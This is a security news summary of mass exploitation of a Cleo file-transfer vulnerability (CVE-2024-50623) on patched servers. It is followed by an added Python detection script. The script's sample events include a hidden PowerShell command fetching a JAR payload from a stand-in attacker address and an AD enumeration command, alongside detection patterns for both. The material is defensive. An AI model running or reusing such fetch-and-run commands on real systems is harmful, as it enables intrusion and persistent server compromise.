Source URL: https://www.theregister.com/2024/12/10/cleo_vulnerability/
Source: The Register
Title: Fully patched Cleo products under renewed ‘zero-day-ish’ mass attack
Feedly Summary: Thousands of servers targeted while customers wait for patches
Researchers at security shop Huntress are seeing mass exploitation of a vulnerability affecting three Cleo file management products, even on patched systems.…
AI Summary and Description: Yes
Summary: Researchers at Huntress have reported widespread exploitation of a vulnerability (CVE-2024-50623) in three Cleo file transfer products, including on systems that had already been patched. Huntress observed attacks against more than 1,700 Cleo servers and believes the number of compromised systems could be significantly higher, because the attackers delete the files they use and leave little behind on disk.
Detailed Description:
– **Vulnerability Overview**:
– The vulnerability (CVE-2024-50623) is an unauthenticated remote code execution (RCE) flaw in Cleo’s managed file transfer products Harmony, VLTrader, and LexiCom. Cleo fixed it in version 5.8.0.21, but Huntress found that servers running that fully patched version are still being exploited.
– Cleo issued that patch in October 2024, yet exploitation continues on patched systems. Huntress calls the situation “zero-day-ish”: the bug has a CVE and a patch, but the patch does not stop the attack, so defenders are effectively facing an unpatched vulnerability.
– **Extent of Exploitation**:
– Huntress observed more than 1,700 Cleo servers being targeted, with indications that many more could be at risk.
– At least 10 Cleo customers across various industries, including consumer products, food services, trucking, and shipping, are believed to have been compromised.
– **Threat Landscape**:
– The campaign resembles the 2023 mass exploitation of Progress MOVEit Transfer, another managed file transfer (MFT) product, which has security experts worried that Cleo’s products are the target of a similarly coordinated effort.
– **Technical Execution of the Attack**:
– Attackers write files into the Cleo software’s autorun directory, where the application executes them automatically; the files are deleted immediately after execution, leaving little for investigators to find on disk.
– The autorun files launch PowerShell commands that contact external IP addresses to retrieve JAR files; the JAR files act as webshells, giving the attackers persistent access to the server.
– The threat actors were also seen enumerating Active Directory assets, a sign that they are preparing to elevate privileges and move beyond the file transfer server.
– **Mitigation Recommendations**:
– Huntress has advised Cleo customers to place affected servers behind a firewall, rather than leaving them directly reachable from the internet, as an interim measure while Cleo prepares an updated patch.
– Customers are also advised to clear the “Autorun Directory” field in the product’s configuration, which disables the execution vector. This is only a partial mitigation: it stops autorun files from being run, but it does not stop the underlying vulnerability from being used to write or modify arbitrary files on the server.
– **Response and Future Actions**:
– Huntress has shared its findings with Cleo, which has acknowledged that its earlier patch needs an urgent update.
– Until the updated patch is released, patched and unpatched systems alike remain at risk of exploitation.
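The attack chain in the Technical Execution section (an autorun file written and promptly deleted, PowerShell spawned by the Cleo service, a JAR pulled from an external address, then Active Directory enumeration) can be hunted for in endpoint telemetry. The script below is an added example, not code from Huntress, Cleo, or The Register: it runs simple correlation rules over Sysmon-style process, file and network events. The events are constructed for illustration; the Cleo install path C:\LexiCom and its autorun subdirectory are assumptions (check the Autorun Directory actually configured on your installation); the 203.0.113.0/24 documentation range stands in for the attacker’s download host; and the AD enumeration commands it matches are generic examples, not indicators reported by Huntress.

```python
"""Hunt for the Cleo exploitation chain in endpoint telemetry.

Added example, not code from Huntress, Cleo or The Register. The sample
events below are constructed and use a Sysmon-style field layout; the
Cleo install path and autorun directory are assumptions for illustration.
"""
import ipaddress
import re
from datetime import datetime, timedelta

# ASSUMPTION: install root of the Cleo product on this host (lower-case for
# case-insensitive comparison). Adjust to your Harmony/VLTrader/LexiCom path.
CLEO_ROOT = r"c:\lexicom"
# ASSUMPTION: the configured Autorun Directory lives under the install root.
AUTORUN_DIR = CLEO_ROOT + r"\autorun"
# An autorun file deleted this soon after creation matches the described tradecraft.
DELETE_WINDOW = timedelta(seconds=30)
# A URL to a JAR file inside a command line (PowerShell fetching the webshell).
JAR_URL_RE = re.compile(r"https?://\S+?\.jar\b", re.IGNORECASE)
# Generic AD enumeration commands; the article only says "enumerating AD assets".
AD_ENUM_RE = re.compile(r"\b(nltest|net\s+group|dsquery|Get-ADComputer)\b", re.IGNORECASE)
# RFC 1918, loopback and link-local; every other address is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
JAVA = r"C:\LexiCom\jre\bin\java.exe"  # ASSUMPTION: the Cleo service's JVM

# Constructed sample telemetry (not real data). 203.0.113.0/24 is the
# documentation range and stands in for the attacker's download host.
SAMPLE_EVENTS = [
    {"ts": "2024-12-09T14:02:10", "type": "file_create", "image": JAVA,
     "path": r"C:\LexiCom\autorun\update.txt"},
    {"ts": "2024-12-09T14:02:11", "type": "process_create", "parent_image": JAVA,
     "image": PS,
     "cmdline": r'powershell -nop -w hidden -c "iwr http://203.0.113.10/a.jar -OutFile C:\LexiCom\temp\a.jar"'},
    {"ts": "2024-12-09T14:02:12", "type": "network_connect", "image": PS,
     "dst_ip": "203.0.113.10", "dst_port": 80},
    {"ts": "2024-12-09T14:02:13", "type": "file_delete", "image": JAVA,
     "path": r"C:\LexiCom\autorun\update.txt"},
    {"ts": "2024-12-09T14:03:00", "type": "process_create", "parent_image": PS,
     "image": r"C:\Windows\System32\nltest.exe", "cmdline": "nltest /dclist:corp.example"},
    # Benign noise: an admin's interactive shell and a partner transfer.
    {"ts": "2024-12-09T14:05:00", "type": "process_create",
     "parent_image": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell Get-Service"},
    {"ts": "2024-12-09T14:05:30", "type": "network_connect", "image": JAVA,
     "dst_ip": "10.0.0.25", "dst_port": 443},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def is_external(ip):
    """True unless the address is in a private, loopback or link-local range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def is_cleo_process(image):
    return image.lower().startswith(CLEO_ROOT)


def hunt(events):
    """Return (rule, timestamp, detail) tuples, in event order, for:
    an autorun file written then deleted within DELETE_WINDOW; PowerShell
    spawned by the Cleo Java service; PowerShell fetching a .jar; PowerShell
    connecting to an external address; AD enumeration commands."""
    findings = []
    pending = {}  # autorun file path -> creation time
    for ev in sorted(events, key=_ts):
        kind, t = ev["type"], _ts(ev)
        image = ev["image"].lower()
        if kind == "file_create" and ev["path"].lower().startswith(AUTORUN_DIR):
            pending[ev["path"].lower()] = t
        elif kind == "file_delete":
            created = pending.pop(ev["path"].lower(), None)
            if created is not None and t - created <= DELETE_WINDOW:
                findings.append(("autorun_write_then_delete", ev["ts"], ev["path"]))
        elif kind == "process_create":
            cmd = ev["cmdline"]
            if is_cleo_process(ev["parent_image"]) and image.endswith("powershell.exe"):
                findings.append(("cleo_spawned_powershell", ev["ts"], cmd))
            jar = JAR_URL_RE.search(cmd)
            if jar and image.endswith("powershell.exe"):
                findings.append(("powershell_jar_fetch", ev["ts"], jar.group(0)))
            if AD_ENUM_RE.search(cmd):
                findings.append(("ad_enumeration", ev["ts"], cmd))
        elif kind == "network_connect":
            if image.endswith("powershell.exe") and is_external(ev["dst_ip"]):
                findings.append(("powershell_external_connect", ev["ts"], ev["dst_ip"]))
    return findings


if __name__ == "__main__":
    for rule, ts, detail in hunt(SAMPLE_EVENTS):
        print(f"{ts} {rule}: {detail}")
```

Feed hunt() your real process, file and network events in the same field layout. A lone autorun_write_then_delete hit is still worth investigating: clearing the Autorun Directory setting stops the file from being executed, but the file write itself shows the vulnerability being used against the server.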
This incident is a reminder that applying a vendor patch does not by itself close a vulnerability: the fix has to be verified, and internet-facing file transfer servers in particular need compensating controls such as network restriction and hardened configuration. Security professionals responsible for infrastructure should know the remote code execution tradecraft described here and have a tested incident response plan for the case where a patch turns out not to work.